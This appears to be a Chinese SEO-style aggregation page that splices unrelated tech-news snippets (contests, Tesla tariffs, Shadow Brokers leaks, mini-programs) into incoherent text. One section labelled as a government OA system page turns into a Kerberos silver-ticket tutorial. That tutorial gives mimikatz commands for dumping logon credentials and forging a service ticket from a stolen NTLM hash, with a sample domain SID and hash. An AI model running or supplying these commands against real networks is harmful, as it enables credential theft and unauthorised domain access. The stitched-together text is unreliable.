第二屆“長沙銀行杯”騰訊云啟創(chuàng)新大賽 | 《數(shù)字英雄》第二季即將開播！:

9月，騰訊云、長沙銀行推出“長沙銀行杯”騰訊云啟創(chuàng)新大賽，聯(lián)合湖南電視臺推出全國首檔真人秀程序員編程團(tuán)隊(duì)競技節(jié)目--《數(shù)字英雄》，基于社會熱點(diǎn)的真實(shí)場景，結(jié)合wecity技術(shù)能力生態(tài)和長沙銀行的金融服務(wù)能力 近年來，湖南數(shù)字產(chǎn)業(yè)已經(jīng)邁入發(fā)展快車道、在全產(chǎn)業(yè)鏈實(shí)現(xiàn)深度鏈接，特別是在湖南省委省政府大力實(shí)施“三高四新”政策背景下，在連續(xù)舉辦八屆岳麓峰會的長沙，數(shù)字人才、數(shù)字產(chǎn)業(yè)、數(shù)字經(jīng)濟(jì)正以前所未有的態(tài)勢急速前進(jìn) 在本次晉級團(tuán)隊(duì)中還有幾只特別的團(tuán)隊(duì)，選題為鄉(xiāng)村數(shù)字化治理協(xié)同共治平臺的黑貓警長隊(duì)是一支深耕公益領(lǐng)域的團(tuán)隊(duì)，領(lǐng)隊(duì)還是民間救援隊(duì)成員，有多次抗災(zāi)救災(zāi)經(jīng)歷；選題為面向電力行業(yè)的數(shù)據(jù)價(jià)值融通服務(wù)平臺的兆物信鏈隊(duì)的三位核心隊(duì)員皆為退伍軍人 3.jpg4.jpg 3、數(shù)字課題與競技選題相匹配、物質(zhì)獎勵與企業(yè)采購相對接： 本次大賽課題設(shè)置兩大方向、五大賽道，分別是智慧城市和鄉(xiāng)村振興兩大課題方向，商貿(mào)、美食、醫(yī)療、園區(qū)、文教五大行業(yè)賽道。 如涉及智慧城市的智慧養(yǎng)老機(jī)構(gòu)管理解決方案、劇本殺行業(yè)數(shù)字化創(chuàng)新服務(wù)方案、冷鏈供應(yīng)鏈管理服務(wù)平臺等；涉及鄉(xiāng)村振興的鄉(xiāng)村數(shù)字化治理協(xié)同共治平臺、智慧農(nóng)貨推動鄉(xiāng)村振興等。

特斯拉起訴美國政府！要求取消對華關(guān)稅，稱中國進(jìn)口零部件關(guān)鍵且不可替代:

大數(shù)據(jù)文摘出品來源：theguardian、cnbc編譯：牛婉楊、魏子敏特斯拉把美國政府給告了。 沒錯，據(jù)《衛(wèi)報(bào)》報(bào)道，特斯拉對特朗普政府提起訴訟，希望喊停特斯拉對從中國進(jìn)口的某些零部件征收的“非法”關(guān)稅。 羅伯特?萊特希澤（左）與特朗普（右）特斯拉：要求將關(guān)稅“連本帶息”歸還根據(jù)申請文件，特斯拉希望取消這些關(guān)稅，并對已經(jīng)繳納的關(guān)稅“退還本金并返還利息”。 除了特斯拉，奔馳也在訴訟文件中指控特朗普政府，“發(fā)起了一場史無前例、無邊界、無限制的貿(mào)易戰(zhàn)，影響了逾5000億美元從中國的進(jìn)口”。 特斯拉表示，受影響的部分是其自動駕駛系統(tǒng)的“大腦”。特斯拉在其豁免請求中寫道：“提高這一特定部件的關(guān)稅，會增加成本并影響盈利能力，從而對特斯拉造成經(jīng)濟(jì)損害?！?br>
錢塘峰會|工業(yè)知識圖譜“錢塘工業(yè)百科”正式發(fā)布:

4月26日，2018第三屆中國工業(yè)大數(shù)據(jù)大會·錢塘峰會在杭州國際博覽中心舉辦。 本次峰會由工信部、浙江省人民政府指導(dǎo)，中國信息通信研究院、中國互聯(lián)網(wǎng)產(chǎn)業(yè)聯(lián)盟、浙江省經(jīng)濟(jì)和信息化委員會、蕭山區(qū)人民政府聯(lián)合主辦。 錢塘工業(yè)百科是由杭州錢塘大數(shù)據(jù)交易中心有限公司借助全球領(lǐng)先的中文認(rèn)知（語義識別）專利技術(shù)——中文認(rèn)知矩陣和動態(tài)平衡模型計(jì)算技術(shù)，自主開發(fā)的覆蓋工業(yè)全產(chǎn)業(yè)鏈的百科全書。 錢塘工業(yè)百科四大構(gòu)成模塊錢塘工業(yè)百科有著極強(qiáng)的行業(yè)性和專業(yè)性。用戶精準(zhǔn)度高，單個(gè)用戶價(jià)值大，在分眾市場和網(wǎng)絡(luò)規(guī)模效應(yīng)方面有著巨大潛力。 ，標(biāo)志著錢塘數(shù)據(jù)完成了“錢塘大數(shù)據(jù)交易平臺”、“工業(yè)新媒體平臺錢塘號”、“工業(yè)大數(shù)據(jù)應(yīng)用解決方案”、“錢塘工業(yè)百科”的產(chǎn)品矩陣部署。

下一個(gè)“永恒之藍(lán)”6月見？shadow brokers組織宣布將公開更多0day漏洞！:

shadow brokers稱，會員會收到的泄露信息會包括：針對瀏覽器、路由器和智能手機(jī)的exp針對操作系統(tǒng)的exp，包括windows 10操作系統(tǒng)從銀行和使用swift金融信息系統(tǒng)的機(jī)構(gòu)泄露的數(shù)據(jù)從俄羅斯 已泄露的“武器庫”中，也可能出現(xiàn)下一個(gè)“永恒之藍(lán)” 事實(shí)上，即便不出售新漏洞，shadow brokers之前泄露的文件仍可能對網(wǎng)絡(luò)造成重大影響，除了此次wannacry攻擊事件中利用到的永恒之藍(lán)(eternalblue )，還有大量nsa的漏洞需要警惕，謹(jǐn)防成為下一個(gè)“永恒之藍(lán)”：shadow brokers調(diào)侃抨擊美國政府及科技公司聲明中還談到了一些其他情況，比如對于最近廣泛猜測的，wannacry疑似朝鮮黑客組織lazarus 除此之外，shadowbrokers還指責(zé)了美國政府和科技公司，比如指責(zé)微軟沒有及時(shí)修復(fù)漏洞。 shadowbrokers稱，美國政府向科技公司支付費(fèi)用讓他們不要修復(fù)產(chǎn)品中的0day漏洞，并在微軟等科技企業(yè)中安插了間諜。

新蔡縣政務(wù)政務(wù)OA系統(tǒng)：那曲政府機(jī)關(guān)oa中域滲透 | 白銀票據(jù)利用

同辦公、智能化管理等目標(biāo)，極大地提升了工作效率和協(xié)作效果。首先，辦公系統(tǒng)軟件oa實(shí)現(xiàn)了信息的集中管理和共享。在傳統(tǒng)的辦公環(huán)境中，員工可能需要通過傳真、郵件或者紙質(zhì)文件來傳遞信息，造成信息的分散和孤立。而政務(wù)OA系統(tǒng)能夠?qū)⒏鞣N信息集中管理在一個(gè)平臺上，并通過權(quán)限設(shè)置實(shí)現(xiàn)信息的共享和傳遞，使得公文系統(tǒng)程更加清晰和高效。其次，政務(wù)OA系統(tǒng)提供了便捷的辦公工具和功能。比如公文管理、日程安排、會議管理、通訊錄等功能，讓員工能夠在一個(gè)系統(tǒng)中完成多種辦公任務(wù)，避免了頻繁切換不同軟件的繁瑣，提高了工作效率。同時(shí)，政務(wù)OA系統(tǒng)還可以根據(jù)企業(yè)的實(shí)際需求進(jìn)行定制開發(fā)，進(jìn)一步滿足不同行業(yè)的特殊需求。另外，辦公系統(tǒng)軟件oa還支持智能化的公文系統(tǒng)程管理。通過設(shè)定公文系統(tǒng)程和審批流程，實(shí)現(xiàn)自動化的任務(wù)分配和協(xié)同辦公，提高了公文系統(tǒng)程的透明度目錄 0x01 介紹 0x02 白銀票據(jù)利用 0x01 介紹 之前，我們已經(jīng)詳細(xì)說過kerberos認(rèn)證的流程，這次我們就來說說如何對其進(jìn)行利用，這次主要說的是白銀票據(jù)偽造（silver tickets） 白銀票據(jù)偽造利用的是kerberos認(rèn)證中的第三個(gè)步驟，在第三步的時(shí)候，client會帶著ticket向server的某個(gè)服務(wù)進(jìn)行請求，如果驗(yàn)證通過就可以訪問server上的指定服務(wù)了，這里ticket的格式是這樣的： 代碼語言：javascript 復(fù)制 server hash(server session key + client info + end time) 其中client info我們是很清楚的，end time也可以根據(jù)自己當(dāng)前的時(shí)間進(jìn)行偽造，server session key是tgs生成的，在未向server發(fā)送ticket的時(shí)候，server也是不知道server session key是什么的，所以只要我們知道server hash就可以去訪問server中的指定服務(wù)了。 其實(shí)與其說這是一種利用方式，倒不如說這是一個(gè)后門，在擁有server hash的時(shí)候，可以隨時(shí)去請求server。 根據(jù)上面的攻擊流程總結(jié)以下白銀票據(jù)的攻擊特點(diǎn)： 1.不需要與kdc進(jìn)行交互 2.需要server的ntlm hash 0x02 白銀票據(jù)利用 代碼語言：javascript 復(fù)制 dc 192.168.6.112 client 192.168.6.113win7-client.zhujian.com server 192.168.6.114win7-server.zhujian.com 這里我們使用文件共享的方式來進(jìn)行驗(yàn)證 輸入\win7-server.zhujian.com\c$進(jìn)行驗(yàn)證 發(fā)現(xiàn)需要輸入密碼才能進(jìn)行連接 然后我們使用mimikatz去server中導(dǎo)出hash 代碼語言：javascript 復(fù)制 mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit">log.txt 可以發(fā)現(xiàn)已經(jīng)獲取到了hash等各種信息 然后回到client中使用mimikatz來偽造票據(jù) 命令如下 代碼語言：javascript 復(fù)制 mimikatz "kerberos::golden /domain:<域名> /sid:<域 sid> /target:<目標(biāo)服務(wù)器主機(jī)名> /service:<服務(wù)類型> /rc4:<ntlmhash> /user:<用戶名> /ptt" exit 其中的信息可以這樣獲得 sid不需要填最后的 -500 注：這里的目標(biāo)服務(wù)器主機(jī)名不能用這里hostname的內(nèi)容，而是要寫全稱 服務(wù)類型可以從以下內(nèi)容中來進(jìn)行選擇，因?yàn)槲覀儧]有tgt去不斷申請ticket，所以只能針對某一些服務(wù)來進(jìn)行偽造 其中的用戶名可以隨便寫，這個(gè)是不受影響的，因?yàn)樵跀?shù)據(jù)傳過去之前server是不知道用戶名的，對于傳輸流程還不太熟悉的，可以移步《windows認(rèn)證 | 域認(rèn)證》 所以最后得到的信息是這樣的 代碼語言：javascript 復(fù)制 mimikatz.exe "kerberos::golden /domain:zhujian.com /sid:s-1-5-21-829259175-2571685386-1296789624 /target: win7-server.zhujian.com /service:cifs /rc4:e467173f3c80e9f23084396625486f60 /user: secquan /ptt" exit 然后再一次進(jìn)行測試 已經(jīng)可以成功訪問了 如果對windows認(rèn)證有興趣的可以看一下下面的幾篇文章來學(xué)習(xí)一下《windows認(rèn)證 | windows本地認(rèn)證》、《windows認(rèn)證 | 網(wǎng)絡(luò)認(rèn)證》、《windows認(rèn)證 | 域認(rèn)證》、《spn掃描》、《kerberoasting攻擊》 推薦閱讀 離線破解navicat密碼 php-fpm在nginx特定環(huán)境下的任意代碼執(zhí)行漏洞（cve-2019-11043） linux權(quán)限詳解 linux文件查找命令詳解 linux重定向及反彈shell詳解 如果對你有幫助，請點(diǎn)擊在看或者轉(zhuǎn)發(fā) 都是對我的一種支持

2017年信息消費(fèi)將達(dá)900億 云計(jì)算帶動產(chǎn)值超1000億:

近日，東莞市政府印發(fā)了《促進(jìn)信息消費(fèi)實(shí)施方案（2015—2017 年）》（下稱《方案》）?！斗桨浮诽岢觯?017年，全市信息消費(fèi)總額要達(dá)到900億元，年均增長20%以上。 在物聯(lián)網(wǎng)應(yīng)用消費(fèi)上，東莞將推動智慧城管、智慧醫(yī)療、智慧商務(wù)、智慧環(huán)保、智慧交通等物聯(lián)網(wǎng)示范應(yīng)用建設(shè)，深入開展石龍、東城、松山湖、虎門港等智慧東莞試點(diǎn)區(qū)域建設(shè)。 ■延伸閱讀東莞信息消費(fèi)空間有多大？1993年，美國政府提出“國家信息基礎(chǔ)設(shè)施”工程計(jì)劃，被通俗的稱為“信息高速公路”。 在今年1月19日的東莞市政府常務(wù)會議上，市長袁寶成表示，信息消費(fèi)對第三產(chǎn)業(yè)尤其是生產(chǎn)性服務(wù)業(yè)具有重要的引導(dǎo)、帶動和提升作用，不是簡單的傳統(tǒng)的消費(fèi)概念。 他說，東莞的信息產(chǎn)值位列全國第七，要進(jìn)一步鞏固地位。信息服務(wù)帶來的變革，將從根本上改變東莞的產(chǎn)業(yè)結(jié)構(gòu)，要爭取讓信息服務(wù)產(chǎn)業(yè)成為東莞產(chǎn)業(yè)轉(zhuǎn)型升級的一個(gè)龍頭。

軟件文檔總結(jié):

首先說一下軟件工程，軟件工程標(biāo)準(zhǔn)的制定有一個(gè)生命周期，從發(fā)起建議到發(fā)布和維護(hù)大致如如下： ? 制定的過程中，按照這個(gè)環(huán)狀生命周期會循環(huán)數(shù)次，不斷地進(jìn)行修改和改正，變得逐漸成熟。 在軟件開發(fā)之前，有一項(xiàng)非常重要的工作，就是寫軟件文檔，軟件文檔從形式上看的話，大致分為兩類：一類是工作表格，就是開發(fā)過程中填寫的各種表格；第二類就是編制的技術(shù)資料或者管理技術(shù)資料。 要是從文檔的生產(chǎn)和使用范圍來分則分為三類： ? 寫好軟件文檔，一份好的文檔相當(dāng)于一份精美的介紹或者使用手冊，讓相關(guān)的工作人員充分的了解新的軟件，從而做出更好地軟件。

小程序憑什么受到那么多人的青睞，它的發(fā)展前景究竟如何:

b： 小程序與線下的連接能力在強(qiáng)化，特別在巨頭都在推廣“新零售”概念的大背景下，小程序是這類生態(tài)的核心入口：連接線下零售商超的“萬達(dá)廣場”、“yh永輝生活+”，連接線下公共交通的“車來了精準(zhǔn)的實(shí)時(shí)公交” c： 政務(wù)類小程序首次上榜。譬如，“粵省事”小程序是廣東省政務(wù)民生服務(wù)的集合入口，通過身份認(rèn)證進(jìn)行統(tǒng)一管理，為用戶提供一站式民生服務(wù)。 ? ? 這是微信官方投放小程序廣告 小程序能爆發(fā)的必然性： 從發(fā)展的角度： 坐公交地鐵，打開小程序掃碼就能付款乘車；去飯店吃飯，在路上就可以用小程序點(diǎn)單，到店直接就餐；去逛商場，一掃小程序碼，商場店鋪布局就出現(xiàn)在手機(jī)上

為什么技術(shù)團(tuán)隊(duì)領(lǐng)導(dǎo)者多是后臺開發(fā)人員:

回到題目，我認(rèn)為還是后臺開發(fā)人員居多，為什么，簡單看看各個(gè)崗位的職能來拆解下原因。 雖然有pm驅(qū)動產(chǎn)品開發(fā)的說法，但往往領(lǐng)導(dǎo)技術(shù)開發(fā)的人是個(gè)懂技術(shù)開發(fā)的，交流起來才更順暢。 ui設(shè)計(jì)？ 第三種情況是前端全棧（我也不清楚為什么前端通到了存儲層，就稱自己為全棧），這種情況從前端展現(xiàn)到后臺服務(wù)都能經(jīng)歷到，承擔(dān)項(xiàng)目團(tuán)隊(duì)管理工作，順理成章，但前面的第一種情況基本無可能。 為什么是后臺開發(fā)人員承擔(dān)項(xiàng)目/產(chǎn)品管理的居多？軟件開發(fā)早期，職能崗位不全時(shí)，就是后臺開發(fā)通吃，后臺開發(fā)貫穿整個(gè)產(chǎn)品周期，從需求分析階段介入，各環(huán)節(jié)的評審都有參與，一直到后期的運(yùn)營維護(hù)，直至停機(jī)運(yùn)行。 這樣的角色與其它角色溝通時(shí)，除了一些專業(yè)交互之外基本沒什么障礙。管理的要素之一就是要降低成本 ，提交效率。溝通成本是產(chǎn)品開發(fā)中比較隱性的大成本。 測試人員不行嗎？

轉(zhuǎn)載請注明出處,本站網(wǎng)址：http://www.nds518.com/news_2311.html